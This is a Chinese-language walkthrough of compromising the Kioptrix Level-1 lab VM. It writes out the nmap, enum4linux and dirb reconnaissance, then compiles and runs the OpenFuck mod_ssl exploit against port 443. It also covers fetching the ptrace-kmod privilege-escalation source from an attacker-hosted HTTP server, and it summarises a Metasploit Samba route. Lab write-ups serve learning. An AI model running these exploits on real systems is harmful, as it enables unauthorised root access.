靶场之路-Kioptix Level-1 mod_ssl 缓冲区溢出漏洞

声明

学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权立刻删除文章条记的只是方便各位师傅学习知识,以下网站涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负

一、准备工作

首先使用 vmware 导入靶机文件，

然后网络模式改成 nat 模式即可

我们打开靶机后发现须要我们拿到 root 权限，那我们实验外部渗透

二、开始工作

1、信息网络

1、首先探测出目标 ip，我们再对目标 ip 地址举行端口存活的扫描，以及使用的服务版本信息等

1. 1、ifconfg（查看自己网段）
2. 2、nmap -sS -sV 192.168.122.188
3. 3、nmap -sn 192.168.122.x/2（探测全网段ip）
4. 4、arp-scan -l(探测存活主机）
5. 5、指纹探测，nmap -p- -sV -A 192.168.122.188（-sV: 服务版本扫描 -A：全面扫描 -p-：全端口扫描，信息全面，比较好确认使用的服务相关信息）

复制代码

以下便是我们采用差别方式探测到的主机 ip

指纹探测，保举使用第 namp -sS -sV ip 探测出来的很清晰，信息很会合

我们得到的信息：

• 22 端口开放，ssh 服务（可实验弱口令）
  
• 80 端口开放，Apache httpd 1.3.20 ((Unix)，mod_ssl/2.8.4 OpenSSL/0.9.6b)，Apache 版本过低大概存在 mod_ssl 漏洞。
  
• 443 端口开放，（80，443 在欣赏器上实验一下）
  
• 139 端口开放，Samba 服务，大概存在漏洞使用
  

2、信息使用

一、找相关exp文件

1、我们实验使用访问欣赏器的 80、443 端口，查询是否有可使用信息

80 端口的页面只有使用的 Apache 服务，和 RedHat，并没给出特别有效信息
2、端口 139 使用（SMB）

1. nmap -T4 -A -p 139 192.168.122.188
2. smbclient -L //SERVER -I 192.168.139.5 -N
3. 匿名登录smb
4. enum4linux -a IP
5. enum4linux 介绍：
7. enum4linux -a 是一个用于枚举 Windows 和 Samba 系统信息的工具，它提供了多种功能，包括获取用户列表、机器列表、共享列表、密码策略信息、组和成员列表等。以下是关于 enum4linux -a 的详细解释和使用方法。
8. enum4linux -a 命令会执行一系列的枚举操作，以获取目标系统上的各种信息。具体来说，它会执行以下操作：
9. 获取用户列表（-U）
10. 获取机器列表（-M）
11. 获取共享列表（-S）
12. 获取密码策略信息（-P）
13. 获取组和成员列表（-G）
14. 通过 RID 循环枚举用户（-r）
15. 获取操作系统信息（-o）
16. 获取打印机信息（-i）
17. 做一个 nmblookup（类似于 nbtstat）（-n）
18. 详细输出，显示正在运行的完整命令（-v)

复制代码

3、使用 dirb，和 dirsearch 扫描目录

1. dirb http://192.168.122.188
2. dirsearch http://192.168.122.188 -e * -i 200
3. 区别：dirb是kali自带的扫描工具，而dirsearch需要自己下载

复制代码

这是我们的探测结果，我们去实验打开他们

我们实验 url，发现了如许一个 mod_ssl 漏洞信息，也是靶场给我们的提示，我们借着这个信息顺藤摸瓜。

漏洞介绍： Apache 的 mod_ssl 缓冲区溢出漏洞主要因模块未严格验证 SSL/TLS 协议处理处罚中的输入数据边界，导致攻击者可通过构造恶意哀求覆盖相邻内存区域。比方，早期 OpenSSL 版本（如 CVE-2014-0160 心脏出血漏洞）因未查抄心跳包长度，引发信息泄漏，而类似逻辑缺陷大概扩展为代码实行风险 4。此类漏洞通常通过发送超长或畸形 SSL 数据触发，大概造成服务崩溃或长途控礼服务器。
3、探求相关 exp 既然我们也清晰了相关漏洞，那我们就要找到相关的 exp，对症下药。

1. 1、searchsploit apache 1.3.20
2. 2、searchsploit mod_ssl
3. 3、选择在网站上查询，https://www.exploit-db.com/search
4. 我们自己决定使用哪条命令，因为在之前我们收集到了mod_ssl的信息，我们选择第二条命令，选择哪种方式都ok

复制代码

我们看到第二张图片， 如何判断我们要使用哪个 exp 也是一个问题，我们要根据之前的网络信息，RedHat、apache 版本等来确定使用哪个 exp。

我们将三个 exp 文件下载下来实验去编译，我们下载后先查看运行的相关信息

记得换源，这个就自行更改就行

4、使用 exp

1. gcc -o OpenFuck 47080.c -lcrypto
2. 使用gcc编译我们的47080.c，每个文件都尝试一下
3. ./OpenFuck | grep 1.3.20
4. 检索查询编译后二进制文件

复制代码

以下是两种检索方式

这么多文件我们要选择哪一个呢，记住我们之前网络到的信息，RedHat、Apache1.3.20

ok,ox6a 的文件的用户权限是 apache，也就是普通用户，这时候我们举行提权 a、下载提权脚本

1. https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

复制代码

b、本机终端开启 80 端口监听服务

1. python -m http.server 80

复制代码

c、另外开一个终端毗连靶机然后在本机 80 端口下载提权文件

1. wget http://192.168.122.187:80/ptrace-kmod.c
2. 注意，ip是本机ip，弄错了就去找块豆腐撞死好吧

复制代码

d、我在再次编译 OpenFcuk 文件，这次登录后实质上已经编译了 ptrace-kmod.c

1. ./OpenFuck 0x6b 192.168.122.188 443 -c 40

复制代码

这时候权限就已经酿成了 root

这个时候就可以任意访问靶机文件了
二、使用msf，smaba漏洞

这里我也是看了其他大佬的文章，也可以使用msf方式举行提权，接下来我们实验一下
先来个简朴的介绍，这种通常要记住端口本身找一找关键信息
Samba长途代码实行漏洞使用 Samba是linux和unix系统上实现smb协议的一个免费软件，由服务器及客户端程序构成Samba服务：对于这个可以在windows与Linux之间举行共享文件的服务同样是我们攻击的关注点；NFS 与 samba 一样，也是在网络中实现文件共享的一种实现，但不支持 windows 平台，samba 是能够在任何支持 SMB 协议的主机之间共享文件的一种实现，固然也包罗 windows。SMB 是一种在局域网上共享文件和打印机的一种通信协议，它为局域网内的差别计算机之间提供文件及打印机等资源的共享服务。samba监听端口：TCP 139/445 | UDP 137/138
1、打开msf

1. msfconsole 
2. 我们打开msf工具

复制代码

2、确定版本 我们要确定我们的smaba版本

这里我们照旧要设定参数的，首先我们选择了探测smaba版本的工具，输入options然后设置探测端口，再运行，我们得到了smaba版本号是2.2.1a

按照大佬所说的小技巧，一般是great和excelle成功率比力高，照旧根据信息网络，选择linux x86

拿下！
总结：固然拿下了，但是也是建立在别人知识的基础上，但是作为打靶路上的第一站，我以为打靶真的可以学到很多东西，固然只是一个简朴靶场但照旧比力有成绩感。其次把打靶的流程也认识了一遍包罗工具的使用，对于我这个喜好啃书本的人来说，实战是非常有冲击感的，盼望以此为始来见证我的渗透之路，走着。
后续我也会出更多打靶文章，盼望各人关注！谢谢。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。